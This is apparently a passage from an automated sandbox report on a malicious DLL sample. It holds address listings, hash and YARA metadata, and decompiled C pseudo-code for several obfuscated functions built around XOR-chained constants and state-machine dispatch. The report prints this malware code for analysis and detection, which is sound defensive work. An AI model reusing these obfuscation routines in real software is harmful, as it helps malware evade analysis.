                                                                                                          0x02b03f65
                                                                                                          0x02b03f6d
                                                                                                          0x02b03f75
                                                                                                          0x02b03f7e
                                                                                                          0x02b03f83
                                                                                                          0x02b03f89
                                                                                                          0x02b03f91
                                                                                                          0x02b03f99
                                                                                                          0x02b03fa1
                                                                                                          0x02b03fa6
                                                                                                          0x02b03fae
                                                                                                          0x02b03fba
                                                                                                          0x02b03fbf
                                                                                                          0x02b03fc5
                                                                                                          0x02b03fca
                                                                                                          0x02b03fd2
                                                                                                          0x02b03fda
                                                                                                          0x02b03fe6
                                                                                                          0x02b03feb
                                                                                                          0x02b03ff5
                                                                                                          0x02b03ff8
                                                                                                          0x02b03ffc
                                                                                                          0x02b04004
                                                                                                          0x02b0400c
                                                                                                          0x02b04014
                                                                                                          0x02b0401c
                                                                                                          0x02b04024
                                                                                                          0x02b0402c
                                                                                                          0x02b04034
                                                                                                          0x02b0403c
                                                                                                          0x02b04041
                                                                                                          0x02b04049
                                                                                                          0x02b04051
                                                                                                          0x02b04059
                                                                                                          0x02b04061
                                                                                                          0x02b04069
                                                                                                          0x02b04071
                                                                                                          0x02b04079
                                                                                                          0x02b04086
                                                                                                          0x02b0408a
                                                                                                          0x02b04094
                                                                                                          0x02b040a3
                                                                                                          0x02b040a4
                                                                                                          0x02b040a8
                                                                                                          0x02b040ac
                                                                                                          0x02b040b0
                                                                                                          0x02b040b8
                                                                                                          0x02b040c0
                                                                                                          0x02b040c5
                                                                                                          0x02b040ca
                                                                                                          0x02b040d2
                                                                                                          0x02b040da
                                                                                                          0x02b040e2
                                                                                                          0x02b040ea
                                                                                                          0x02b040f2
                                                                                                          0x02b04100
                                                                                                          0x02b04104
                                                                                                          0x02b0410c
                                                                                                          0x02b04114
                                                                                                          0x02b0411c
                                                                                                          0x02b04124
                                                                                                          0x02b04129
                                                                                                          0x02b04131
                                                                                                          0x02b04139
                                                                                                          0x02b04141
                                                                                                          0x02b04149
                                                                                                          0x02b04151
                                                                                                          0x02b04159
                                                                                                          0x02b0415e
                                                                                                          0x02b04166
                                                                                                          0x02b0416e
                                                                                                          0x02b04176
                                                                                                          0x02b0417b
                                                                                                          0x02b04188
                                                                                                          0x02b0418c
                                                                                                          0x02b04194
                                                                                                          0x02b0419c
                                                                                                          0x02b041a4
                                                                                                          0x02b041ac
                                                                                                          0x02b041b4
                                                                                                          0x02b041b9
                                                                                                          0x02b041c1
                                                                                                          0x02b041c9
                                                                                                          0x02b041d1
                                                                                                          0x02b041d9
                                                                                                          0x02b041e1
                                                                                                          0x02b041e6
                                                                                                          0x02b041ee
                                                                                                          0x02b041ee
                                                                                                          0x02b041ee
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x00000000
                                                                                                          0x02b041f6
                                                                                                          0x02b04208
                                                                                                          0x02b042d3
                                                                                                          0x02b042df
                                                                                                          0x02b042e5
                                                                                                          0x02b042f0
                                                                                                          0x02b042f7
                                                                                                          0x02b042fb
                                                                                                          0x02b0430a
                                                                                                          0x02b04335
                                                                                                          0x02b0433a
                                                                                                          0x02b04352
                                                                                                          0x02b0435b
                                                                                                          0x02b04369
                                                                                                          0x02b0436d
                                                                                                          0x02b04370
                                                                                                          0x02b04373
                                                                                                          0x02b0437c
                                                                                                          0x02b04388
                                                                                                          0x00000000
                                                                                                          0x02b0420e
                                                                                                          0x02b04214
                                                                                                          0x02b042bc
                                                                                                          0x02b042c2
                                                                                                          0x02b042c7
                                                                                                          0x02b042ca
                                                                                                          0x00000000
                                                                                                          0x02b0421a
                                                                                                          0x02b04220
                                                                                                          0x02b04299
                                                                                                          0x02b0429e
                                                                                                          0x02b042a2
                                                                                                          0x02b042a5
                                                                                                          0x02b042a9
                                                                                                          0x02b042ae
                                                                                                          0x02b042b2
                                                                                                          0x00000000
                                                                                                          0x02b04222
                                                                                                          0x02b04228
                                                                                                          0x02b04272
                                                                                                          0x02b04274
                                                                                                          0x02b0427c
                                                                                                          0x00000000
                                                                                                          0x02b0422a
                                                                                                          0x02b04230
                                                                                                          0x02b043c4
                                                                                                          0x02b04236
                                                                                                          0x02b0423c
                                                                                                          0x02b043a7
                                                                                                          0x02b043a7
                                                                                                          0x02b043ad
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x00000000
                                                                                                          0x02b041f2
                                                                                                          0x02b04242
                                                                                                          0x02b04252
                                                                                                          0x02b04253
                                                                                                          0x02b0425b
                                                                                                          0x02b0425d
                                                                                                          0x02b04262
                                                                                                          0x02b04268
                                                                                                          0x02b041ee
                                                                                                          0x02b041ee
                                                                                                          0x02b041ee
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x00000000
                                                                                                          0x02b041f2
                                                                                                          0x02b041f2
                                                                                                          0x02b041ee
                                                                                                          0x02b04262
                                                                                                          0x02b0423c
                                                                                                          0x02b04230
                                                                                                          0x02b04228
                                                                                                          0x02b04220
                                                                                                          0x02b04214
                                                                                                          0x02b043cb
                                                                                                          0x02b043d7
                                                                                                          0x02b043db
                                                                                                          0x02b043e0
                                                                                                          0x02b043e5
                                                                                                          0x02b043e5
                                                                                                          0x02b04391
                                                                                                          0x02b04396
                                                                                                          0x02b0439b
                                                                                                          0x02b0439d
                                                                                                          0x02b043a0
                                                                                                          0x02b043a4
                                                                                                          0x02b043a4
                                                                                                          0x02b043a4
                                                                                                          0x00000000
                                                                                                          0x02b043a4
                                                                                                          0x02b041f2

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ldM'$q($r'$y%$z}
                                                                                                          • API String ID: 0-1771948706
                                                                                                          • Opcode ID: b5fdbbabb233b8b171e68dde2d756661a73a54f7eb3ea9aab42a88b1d3112d97
                                                                                                          • Instruction ID: dc383fb7396daa73a4a20037a6ac42b1d618aa21674a2d4958dc44e07f7aed92
                                                                                                          • Opcode Fuzzy Hash: b5fdbbabb233b8b171e68dde2d756661a73a54f7eb3ea9aab42a88b1d3112d97
                                                                                                          • Instruction Fuzzy Hash: C9D14F721083819FD368CF25C48955BBFF2FB99358F148A0DF2A696260D3B5C949CF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEFB8E, Relevance: 6.5, Strings: 5, Instructions: 266COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AEFB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E02AEC5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0x2b06224; // 0x0
								_t297 = E02AE2194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E02B02B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0x2b06224; // 0x0
					_t286 = E02AE2194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}



















































                                                                                                          0x02aefb92
                                                                                                          0x02aefb9c
                                                                                                          0x02aefba3
                                                                                                          0x02aefba5
                                                                                                          0x02aefba6
                                                                                                          0x02aefba7
                                                                                                          0x02aefba8
                                                                                                          0x02aefbad
                                                                                                          0x02aefbb5
                                                                                                          0x02aefbb8
                                                                                                          0x02aefbc4
                                                                                                          0x02aefbc6
                                                                                                          0x02aefbcd
                                                                                                          0x02aefbd0
                                                                                                          0x02aefbd4
                                                                                                          0x02aefbdc
                                                                                                          0x02aefbe4
                                                                                                          0x02aefbec
                                                                                                          0x02aefbf4
                                                                                                          0x02aefbfc
                                                                                                          0x02aefc04
                                                                                                          0x02aefc0c
                                                                                                          0x02aefc14
                                                                                                          0x02aefc21
                                                                                                          0x02aefc25
                                                                                                          0x02aefc2d
                                                                                                          0x02aefc35
                                                                                                          0x02aefc3d
                                                                                                          0x02aefc42
                                                                                                          0x02aefc47
                                                                                                          0x02aefc4f
                                                                                                          0x02aefc57
                                                                                                          0x02aefc64
                                                                                                          0x02aefc68
                                                                                                          0x02aefc6d
                                                                                                          0x02aefc72
                                                                                                          0x02aefc7a
                                                                                                          0x02aefc8a
                                                                                                          0x02aefc8e
                                                                                                          0x02aefc96
                                                                                                          0x02aefca3
                                                                                                          0x02aefca6
                                                                                                          0x02aefcaa
                                                                                                          0x02aefcb2
                                                                                                          0x02aefcc2
                                                                                                          0x02aefcc6
                                                                                                          0x02aefcce
                                                                                                          0x02aefcd6
                                                                                                          0x02aefcde
                                                                                                          0x02aefce6
                                                                                                          0x02aefceb
                                                                                                          0x02aefcf3
                                                                                                          0x02aefcfb
                                                                                                          0x02aefd03
                                                                                                          0x02aefd08
                                                                                                          0x02aefd10
                                                                                                          0x02aefd18
                                                                                                          0x02aefd25
                                                                                                          0x02aefd26
                                                                                                          0x02aefd30
                                                                                                          0x02aefd34
                                                                                                          0x02aefd3e
                                                                                                          0x02aefd4c
                                                                                                          0x02aefd51
                                                                                                          0x02aefd57
                                                                                                          0x02aefd5f
                                                                                                          0x02aefd67
                                                                                                          0x02aefd6f
                                                                                                          0x02aefd77
                                                                                                          0x02aefd7f
                                                                                                          0x02aefd87
                                                                                                          0x02aefd8f
                                                                                                          0x02aefd97
                                                                                                          0x02aefd9f
                                                                                                          0x02aefdac
                                                                                                          0x02aefdaf
                                                                                                          0x02aefdb3
                                                                                                          0x02aefdbb
                                                                                                          0x02aefdc3
                                                                                                          0x02aefdcb
                                                                                                          0x02aefdd3
                                                                                                          0x02aefddb
                                                                                                          0x02aefde3
                                                                                                          0x02aefdf0
                                                                                                          0x02aefdf4
                                                                                                          0x02aefdfc
                                                                                                          0x02aefe04
                                                                                                          0x02aefe10
                                                                                                          0x02aefe15
                                                                                                          0x02aefe1b
                                                                                                          0x02aefe23
                                                                                                          0x02aefe2b
                                                                                                          0x02aefe38
                                                                                                          0x02aefe39
                                                                                                          0x02aefe3d
                                                                                                          0x02aefe45
                                                                                                          0x02aefe4d
                                                                                                          0x02aefe55
                                                                                                          0x02aefe5d
                                                                                                          0x02aefe65
                                                                                                          0x02aefe6d
                                                                                                          0x02aefe75
                                                                                                          0x02aefe7d
                                                                                                          0x02aefe85
                                                                                                          0x02aefe8a
                                                                                                          0x02aefe92
                                                                                                          0x02aefe9a
                                                                                                          0x02aefea2
                                                                                                          0x02aefeaa
                                                                                                          0x02aefeb2
                                                                                                          0x02aefeba
                                                                                                          0x02aefec2
                                                                                                          0x02aefed0
                                                                                                          0x02aefed4
                                                                                                          0x02aefedc
                                                                                                          0x02aefee4
                                                                                                          0x02aefeec
                                                                                                          0x02aefef4
                                                                                                          0x02aefefc
                                                                                                          0x02aeff04
                                                                                                          0x02aeff0c
                                                                                                          0x02aeff14
                                                                                                          0x02aeff1c
                                                                                                          0x02aeff24
                                                                                                          0x02aeff31
                                                                                                          0x02aeff39
                                                                                                          0x02aeff41
                                                                                                          0x02aeff41
                                                                                                          0x02aeff4f
                                                                                                          0x02aeffed
                                                                                                          0x02aeffee
                                                                                                          0x02aefff6
                                                                                                          0x02aefffb
                                                                                                          0x02aefffe
                                                                                                          0x02af0007
                                                                                                          0x02af000d
                                                                                                          0x00000000
                                                                                                          0x02af000d
                                                                                                          0x02aeff55
                                                                                                          0x02aeff5b
                                                                                                          0x02aeff7c
                                                                                                          0x02aeffc1
                                                                                                          0x02aeffc6
                                                                                                          0x02aeffcd
                                                                                                          0x02aeffd3
                                                                                                          0x00000000
                                                                                                          0x02aeffd3
                                                                                                          0x02aeff5d
                                                                                                          0x02aeff63
                                                                                                          0x02af009c
                                                                                                          0x02aeff69
                                                                                                          0x02aeff6f
                                                                                                          0x00000000
                                                                                                          0x02aeff75
                                                                                                          0x02aeff75
                                                                                                          0x00000000
                                                                                                          0x02aeff75
                                                                                                          0x02aeff6f
                                                                                                          0x02aeff63
                                                                                                          0x02aeff5b
                                                                                                          0x02af00bb
                                                                                                          0x02af00c4
                                                                                                          0x02af00c4
                                                                                                          0x02af001b
                                                                                                          0x02af0065
                                                                                                          0x02af006a
                                                                                                          0x02af0071
                                                                                                          0x02af00ae
                                                                                                          0x02af00b0
                                                                                                          0x02af00b8
                                                                                                          0x02af0073
                                                                                                          0x02af0073
                                                                                                          0x00000000
                                                                                                          0x02af0073
                                                                                                          0x00000000
                                                                                                          0x02af0078
                                                                                                          0x02af0078
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Gm$L$Wx$] $wh=u
                                                                                                          • API String ID: 0-1494249286
                                                                                                          • Opcode ID: 67a1b27c679fb60c44b4e31d2528cb6eeedc81fdb78284759482576e52d21cab
                                                                                                          • Instruction ID: 36cccc8233f97d186337738ecd2c7d56b6ff706ffb42c83ac76a3fb95a34cc85
                                                                                                          • Opcode Fuzzy Hash: 67a1b27c679fb60c44b4e31d2528cb6eeedc81fdb78284759482576e52d21cab
                                                                                                          • Instruction Fuzzy Hash: FED11E724093819FD768CF65C88991BFBF1FB89748F10891DF29686260D7B68949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF8D3D, Relevance: 6.4, Strings: 5, Instructions: 143COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AF8D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x2b06208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E02AEC5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x2b06208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E02AF0EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E02B036AA);
								_t155 =  *0x2b06208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E02AE48DD(_v32, _v48, _v52);
					_t155 =  *0x2b06208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}





























                                                                                                          0x02af8d3d
                                                                                                          0x02af8d40
                                                                                                          0x02af8d47
                                                                                                          0x02af8d4f
                                                                                                          0x02af8d57
                                                                                                          0x02af8d5f
                                                                                                          0x02af8d67
                                                                                                          0x02af8d6f
                                                                                                          0x02af8d77
                                                                                                          0x02af8d7f
                                                                                                          0x02af8d84
                                                                                                          0x02af8d8c
                                                                                                          0x02af8d94
                                                                                                          0x02af8d99
                                                                                                          0x02af8dab
                                                                                                          0x02af8db5
                                                                                                          0x02af8db9
                                                                                                          0x02af8dbb
                                                                                                          0x02af8dc3
                                                                                                          0x02af8dd1
                                                                                                          0x02af8dd6
                                                                                                          0x02af8dda
                                                                                                          0x02af8de2
                                                                                                          0x02af8dea
                                                                                                          0x02af8df2
                                                                                                          0x02af8dfa
                                                                                                          0x02af8dff
                                                                                                          0x02af8e07
                                                                                                          0x02af8e0f
                                                                                                          0x02af8e17
                                                                                                          0x02af8e22
                                                                                                          0x02af8e27
                                                                                                          0x02af8e31
                                                                                                          0x02af8e36
                                                                                                          0x02af8e3a
                                                                                                          0x02af8e42
                                                                                                          0x02af8e4a
                                                                                                          0x02af8e52
                                                                                                          0x02af8e5a
                                                                                                          0x02af8e5f
                                                                                                          0x02af8e67
                                                                                                          0x02af8e6f
                                                                                                          0x02af8e7f
                                                                                                          0x02af8e85
                                                                                                          0x02af8e8d
                                                                                                          0x02af8e95
                                                                                                          0x02af8e9d
                                                                                                          0x02af8ea1
                                                                                                          0x02af8ea2
                                                                                                          0x02af8ea4
                                                                                                          0x02af8ea8
                                                                                                          0x02af8eb0
                                                                                                          0x02af8eb5
                                                                                                          0x02af8ebd
                                                                                                          0x02af8ec5
                                                                                                          0x02af8ecd
                                                                                                          0x02af8ed5
                                                                                                          0x02af8ee2
                                                                                                          0x02af8eef
                                                                                                          0x02af8ef7
                                                                                                          0x02af8eff
                                                                                                          0x02af8f07
                                                                                                          0x02af8f0d
                                                                                                          0x02af8f0d
                                                                                                          0x02af8f13
                                                                                                          0x02af8f66
                                                                                                          0x02af8f67
                                                                                                          0x02af8f6f
                                                                                                          0x02af8f71
                                                                                                          0x02af8f74
                                                                                                          0x02af8f7a
                                                                                                          0x00000000
                                                                                                          0x02af8f15
                                                                                                          0x02af8f17
                                                                                                          0x00000000
                                                                                                          0x02af8f1d
                                                                                                          0x02af8f37
                                                                                                          0x02af8f3c
                                                                                                          0x02af8f45
                                                                                                          0x02af8f45
                                                                                                          0x02af8f17
                                                                                                          0x02af8f48
                                                                                                          0x02af8f55
                                                                                                          0x02af8f55
                                                                                                          0x02af8f85
                                                                                                          0x02af8f8d
                                                                                                          0x02af8f92
                                                                                                          0x02af8f98
                                                                                                          0x02af8f9b
                                                                                                          0x02af8f9d
                                                                                                          0x02af8fa0
                                                                                                          0x02af8fa0
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #$ _$7S$^M$|Y+
                                                                                                          • API String ID: 0-3744723356
                                                                                                          • Opcode ID: f1a38aa4e2646a83144088cbf5eb1be957c41a6d977acb4bde181d84c90c56d3
                                                                                                          • Instruction ID: 03af167122c43d3914c0a621fc0c0c67a9b72918e29466b709efb8792e3ec4f9
                                                                                                          • Opcode Fuzzy Hash: f1a38aa4e2646a83144088cbf5eb1be957c41a6d977acb4bde181d84c90c56d3
                                                                                                          • Instruction Fuzzy Hash: DD5165719083419FD348CF65D48A50BBBE1FBC8768F008A1DF1D9A6260D7B9CA59CF4A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF437A, Relevance: 5.4, Strings: 4, Instructions: 412COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 82%
                                                                                                          			E02AF437A(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				intOrPtr _v168;
				char _v228;
				short _v772;
				short _v774;
				char _v776;
				signed int _v820;
				char _v1340;
				char _v1860;
				void* _t400;
				signed int _t441;
				signed int _t445;
				intOrPtr _t447;
